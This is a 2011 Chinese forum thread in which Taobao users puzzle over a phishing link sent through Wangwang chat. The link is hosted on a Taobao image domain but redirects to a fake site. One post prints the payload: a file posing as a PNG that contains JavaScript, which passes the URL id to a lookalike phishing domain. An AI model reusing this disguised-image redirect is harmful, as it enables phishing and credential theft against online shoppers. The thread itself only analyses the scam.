看看这个跳转是怎么实现的（淘宝新的钓鱼连接）

挨个搞 · 发表于 2011-1-21 21:09:50

刚收到旺旺信息，内容很老套，但是连接很牛，旺旺也判定是安全连接

老板,在吗，这款还有货吗？，http://img.taobao.com/shop-logo/8a/T1WGhZXalsXXb1upjX?id=7641741 怎么拍不了啊，我要买7件啊

复制代码

连接域名是淘宝的，但是自动跳转到了钓鱼网站
觉得蛮牛的
不知道怎么实现的
高手谁知道的。。

cnweb · 发表于 2011-1-21 21:10:55

牛啊

taian · 发表于 2011-1-21 21:13:49

真的哎。。

秋上书 · 发表于 2011-1-21 21:15:53

图片里面加木马了吧

usa · 发表于 2011-1-21 21:15:56

去taobao传张图片来对比看看...

yaoe · 发表于 2011-1-21 21:17:24

png漏洞?
这玩意在opera上无效,应该是针对ie的

小牧 · 发表于 2011-1-21 21:17:28

骗子们真是煞费苦心啊

挨个搞 · 发表于 2011-1-21 21:18:41

淘宝自己商品的图片一般都是在这个域名下
http://img08.taobaocdn.com

woaijay987 · 发表于 2011-1-21 21:19:08

这是某个官方图片空间的转换地址，现在有一种解释工具可以转换，跟官方差不多......黑客动画吧吧友回答的...

挨个搞 · 发表于 2011-1-21 21:20:48

opera下打开是这样一个代码

塒NG
<html>
<SCRIPT LANGUAGE="JavaScript">
<!--
function Request(strName)
{
var strHref = window.document.location.href;
var intPos = strHref.indexOf("?");
var strRight = strHref.substr(intPos + 1);
var arrTmp = strRight.split("&");
for(var i = 0; i < arrTmp.length; i++)
{
var arrTemp = arrTmp[i].split("=");
if(arrTemp[0].toUpperCase() == strName.toUpperCase()) return arrTemp[1];
}
return "";
}
window.location.href="http://itam.taobao.cm.0drg.co.cc/h.taobao.com/tb1.asp?id="+Request("id");
//-->
</SCRIPT>
</html>

复制代码

		自动登录	找回密码
密码			注册